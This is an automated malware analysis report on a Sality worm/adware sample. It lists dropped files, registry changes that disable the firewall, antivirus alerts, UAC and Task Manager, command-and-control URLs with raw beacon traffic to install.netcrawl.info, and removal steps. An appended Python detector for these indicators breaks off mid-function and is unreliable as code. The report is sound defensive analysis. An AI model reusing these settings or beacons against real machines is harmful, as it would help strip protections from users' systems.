not-a-virus:AdWare.Win32.SwiftBrowse.o (Kaspersky), Virus.Win32.Sality.FD, Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Worm, Virus, Adware, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: a78e948b9438fb5d0b463a9109373fed
SHA1: 2ef8856b7b309736cb5ced4a518da3facbd6b990
SHA256: 156fa42bd3c54c5730c66990be5c3c834b801c5bc82186e7771385c207dfb73e
SSDeep: 12288:EvHTO3scLzbKfI1s15Ap/G/8/3D0Fw/tN8dkmLtpHHHrh7OGwZpnZfI:EvHK3scL6j8/z0FmcLbH1OGwvnZg
Size: 659872 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:52:01
Analyzed on: WindowsXP SP3 32-bit
Summary: Virus. A program that recursively replicates a possibly evolved copy of itself.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Virus's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Virus creates the following process(es):
%original file name%.exe:652
NetCrawl.mg.exe:1964
The Virus injects its code into the following process(es):
Explorer.EXE:532
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:652 makes changes in the file system.
The Virus creates and/or writes to the following file(s):
%WinDir%\system.ini (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (3277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (8400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2AB_Rar\%original file name%.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ilg (259958 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (7 bytes)
The Virus deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsa1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ilg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (0 bytes)
Registry activity
The process %original file name%.exe:652 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
[HKCU\Software\Aas]
"a4_116" = "831618036"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 DF 10 C0 5B AE 62 FE 5E 62 5D 2E C7 01 CD 61"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
The Virus modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
Firewall notifications are disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"
The Virus modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Task Manager is disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "1"
The Virus modifies the IE security-zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Windows Firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
Adds a Windows Firewall rule that allows any network activity by the file:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"
The Virus deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process NetCrawl.mg.exe:1964 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B EE FD F8 71 86 00 99 F2 FB 6D F8 2E 65 BA 8A"
Dropped PE files
MD5 | File path |
---|---|
9b22fa552e37770118146e753a34d03f | c:\xfdei.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Virus's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:652
NetCrawl.mg.exe:1964
- Delete the original Virus file.
- Delete or disinfect the following files created/modified by the Virus:
%WinDir%\system.ini (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (3277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (8400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2AB_Rar\%original file name%.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ilg (259958 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (7 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 22738 | 23040 | 4.49116 | 4dde9ee04459a4d76108ba4e7e9cf6a4 |
.rdata | 28672 | 4496 | 4608 | 3.59034 | a2c7710fa66fcbb43c7ef0ab9eea5e9a |
.data | 36864 | 253816 | 1024 | 3.1957 | acf5fcee4a8110074c3935a8dde700a9 |
.ndata | 290816 | 688128 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 978944 | 81920 | 80384 | 5.5234 | b13f4a1cf59c57c4de44cfc5ec7498cd |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://netcrawl.info/mg?alpha=Yy0QEkASO15SQ1hDPzhPXGRSAUU9PhQuABg9RxQvJy0LWFN1Bh0RLmVpemBlOCYQQDpqRnphBXc2M0tWZGVrE0IPKVd7TjADBB4DTHQycUIhMRZDHHUoWG5AFUMPUFxlfFEERTZRDWQuYW8MFBE/OxVHPHUCPR1bPD0cH1tmeGYSRQctWwQwRnsDEh9uWXAhBCwyABZCJiVEdn99bQw1YA== | |
hxxp://netcrawl.info/mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y | |
hxxp://netcrawl.info/mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ== | |
hxxp://netcrawl.info/fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR | |
hxxp://netcrawl.info/ii?alpha=... | |
hxxp://install.netcrawl.info/ii?alpha=... | 8.34.112.26 |
hxxp://install.netcrawl.info/mg?alpha=Yy0QEkASO15SQ1hDPzhPXGRSAUU9PhQuABg9RxQvJy0LWFN1Bh0RLmVpemBlOCYQQDpqRnphBXc2M0tWZGVrE0IPKVd7TjADBB4DTHQycUIhMRZDHHUoWG5AFUMPUFxlfFEERTZRDWQuYW8MFBE/OxVHPHUCPR1bPD0cH1tmeGYSRQctWwQwRnsDEh9uWXAhBCwyABZCJiVEdn99bQw1YA== | 8.34.112.26 |
hxxp://install.netcrawl.info/fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR | 8.34.112.26 |
hxxp://install.netcrawl.info/mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y | 8.34.112.26 |
hxxp://install.netcrawl.info/mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ== | 8.34.112.26 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /mg?alpha=Yy0QEkASO15SQ1hDPzhPXGRSAUU9PhQuABg9RxQvJy0LWFN1Bh0RLmVpemBlOCYQQDpqRnphBXc2M0tWZGVrE0IPKVd7TjADBB4DTHQycUIhMRZDHHUoWG5AFUMPUFxlfFEERTZRDWQuYW8MFBE/OxVHPHUCPR1bPD0cH1tmeGYSRQctWwQwRnsDEh9uWXAhBCwyABZCJiVEdn99bQw1YA== HTTP/1.1
User-Agent: WinHttpClient
Host: install.netcrawl.info
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP003C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:17 GMT
Content-Length: 184148
<<< skipped >>>
POST /mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ== HTTP/1.1
Content-Length: 246
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Host: install.netcrawl.info
Connection: Keep-Alive
alpha=bCJoDyADD08zBl9NRyUvU2sqHCUyMWwzYBcyPwlPKCJzRTN6CWUMTmpmAn0FNyloXVplSQJ8ZXg5S1Y2a2oTDiIAJi9mLj8MfANjQ3tKbCIuPm5efHonIHMgGkx3TTxqcykZJTledXlObmB0CXEwNG1aXHoNRQA7MzJkAjtpdx4PJQgiIxlQSXR7D39hVgg8ZCM9eAsiKSo8ZXFcQWNNIGtzNgUkOFx0cUZqGz1uMBcgLg==
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP003C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:20 GMT
Content-Length: 0
GET /mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.netcrawl.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:17 GMT
Content-Length: 2004
aNEaHLo37W9O8F qJ2Dlf4leFLU9xkUL8QzmTEysZohaGPt07U943njrfWaWJtsNCZcs/2YU6he KCTZEOgKb4lEkQ1e ErSUl2tS40PJ/xGoV8YpDiNHDX5ctNsC/Mu9gRArSG/XDuIL8Z4S7Zh1RUXgzT7aAytPJceE g40ABNkEOGSgrifNFQBf1Cji4h7VScWBSgK6cXNelFrRII9zLDExatZO5OLYsoxxQQvWWbXBzaevI8T6swxUEE7ijRKwCHFIoMErYwjRALq12ROWCyOLVnLoFsyF0g61rnClS0DckFU F5 Fg0hTbQanaLdphMHIUrtwlBpi2TFAK cZYgTZBDhiZR4WyfBkeqSI1wYO1ijUkeoiuAKTHmW oKVPgr3BoWrWvyWDmBFMJCQ61htEcclTO1fkipKJQeXL40xzJbk0SHSgrqaNFPTPMGhCQj627fFgmkO4ECfPEM5kxMrGeBWhj7dO1PeN546315jCbbDQmXLP9mFOoXnggZ8inRJEKdWpA0bN99z1VHuFfDcGD e5FZGJgviRpysED6RAK6fNUOSupu6U8 sjvPQ0/5PplaFZp0tSJBuieCNRHoNMIzb5RTgAMStm/cUFq6CMM1Mextkl4Z9HSCHjz5S6MKC 4/0wIYtXnvXz ZdtgUQ78mzRZL2nrjPV6tZt1ZONcO43QA3kaCHFiuM59vUKxNjygn nScQA6KEqUKJOV8 kYdtHKSAFvjePhkO4k/gQxErmibA1uTIOchTbwhgy0R8CjRdBaSQ48EHK5v0k5KumqAKCv f75EGLUlxkU260L8TUK0N8MSTeB/ QhggjvPRU/3JpJXGJUstX5aujGCBlznf90yDsYP0EQS HDNWQvlBqkXEd840Q4NtzqMXWqoffZbB/gq1QRU7mHudga0KMxVbq5phw1V1C72KFutCoYWFb5n2iNAkBrBDUj8bN5ITLtygDA37TjHQgi6IshdNuVc7E0g9yrZAF/MZfhJMcZgxVdGqGHbDRCFPOArXKxm3R0R8C7Reg6ZToILRK4zyU5culnNJ2Dhft8WROJixgsp kutEkzeFeMhGKMv7UsujHiZFGeyZ4VACpk 4xhyny2JHx/rLugKb4lEkQ1e F/YTlq2S48AHt10lEIOoi IEwzWb FcB9ox1xFf/S xCCyFNtZTZLppkg1DmC37KALqIZ8LFf8p0TJ6nVqWDRK2Z8hQRfMGhzMw63 zTQm/OIE8OO9N5ApU8D/cBV jL/RZPpM10VII4WKWQwqTdLUhVqknk1lK6C/BM1HQTcEBVK4zjAwb8waVJTLtOMcONZ0ds118qF7uXAa0ZJI7U x/8lk1gi7/an2yapNADoUEywdbujaCFQTKOMYlRZNYvzRl4mDTT12 SI0AHt9zj0kOvi WFHKmDPlJAuM7/hdX6i nRC INo8UT6N0kkwNkzzBJUK9IcVBHukx2HoOmlmRC1XCaMlVX7pniTkh4zjHShy6PYFTcuNd618B5DqSTFzuYe5PdsY/21dJrybN
<<< skipped >>>
GET /fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.netcrawl.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:20 GMT
Content-Length: 0
GET /ii?alpha=<<< skipped >>> HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.netcrawl.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:20 GMT
Content-Length: 84
gtXkIIKIj6Yk95222VzDhJimNJ2G2qMt8IvZgnCClsH6apXd96EKsJyFpXOQnZK2IOyI/c9 nNODAqYod5Nu
Map
The Virus connects to the servers at the following location(s):
install.netcrawl.info
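The captures above share one request shape: Host install.netcrawl.info, paths /mg, /fp and /ii carrying a base64 `alpha` parameter, and the User-Agents WinHttpClient and NSIS_Inetc (Mozilla). As an added example that is not part of this report, the Python below turns that shape into detection logic over proxy-log lines. The log layout and the sample lines are constructed for the example (the first three reproduce requests from the capture, the last two are benign controls); the indicator values come from the capture. It also decodes the alpha parameter, which is raw base64 dropped into the query string without percent-encoding, so a parser that URL-decodes '+' to a space would corrupt it.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# Indicators taken from the captured traffic in this report.
C2_HOST = "install.netcrawl.info"
C2_PATHS = {"/mg", "/fp", "/ii"}
C2_AGENTS = {"WinHttpClient", "NSIS_Inetc (Mozilla)"}

# Constructed sample lines in an assumed minimal proxy-log layout:
# "<client-ip> <method> <absolute-url> <user-agent>".
SAMPLE_LOG = """\
10.0.0.5 POST http://install.netcrawl.info/mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ== WinHttpClient
10.0.0.5 GET http://install.netcrawl.info/mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y NSIS_Inetc (Mozilla)
10.0.0.5 GET http://install.netcrawl.info/fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR NSIS_Inetc (Mozilla)
10.0.0.7 GET http://www.example.com/index.html Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
10.0.0.9 GET http://cdn.example.net/mg?alpha=1 Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
"""

LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<ua>.+)$")

# The alpha value is raw base64 in the query string, so '+' and '/' appear
# literally. parse_qs() would turn '+' into a space and corrupt the value;
# pull it out with a regex instead.
ALPHA_RE = re.compile(r"[?&]alpha=([^&\s]*)")


def alpha_payload_length(url):
    """Decode the alpha parameter; return its byte length, or None if absent/invalid."""
    m = ALPHA_RE.search(url)
    if not m:
        return None
    try:
        return len(base64.b64decode(m.group(1), validate=True))
    except (binascii.Error, ValueError):
        return None


def score_request(ip, method, url, ua):
    """Return the list of indicator names a single request matches."""
    parts = urlsplit(url)
    reasons = []
    if parts.hostname == C2_HOST:
        reasons.append("host:" + C2_HOST)
    if parts.path in C2_PATHS and ALPHA_RE.search(url):
        reasons.append("beacon-path:" + parts.path)
    if ua in C2_AGENTS:
        reasons.append("user-agent:" + ua)
    return reasons


def scan_log(text):
    """Return (client-ip, url, reasons) for lines matching this beacon pattern.

    A host match is sufficient on its own; otherwise two independent
    indicators are required, so a lone '/mg?alpha=' on an unrelated
    site does not fire.
    """
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = score_request(**m.groupdict())
        if any(r.startswith("host:") for r in reasons) or len(reasons) >= 2:
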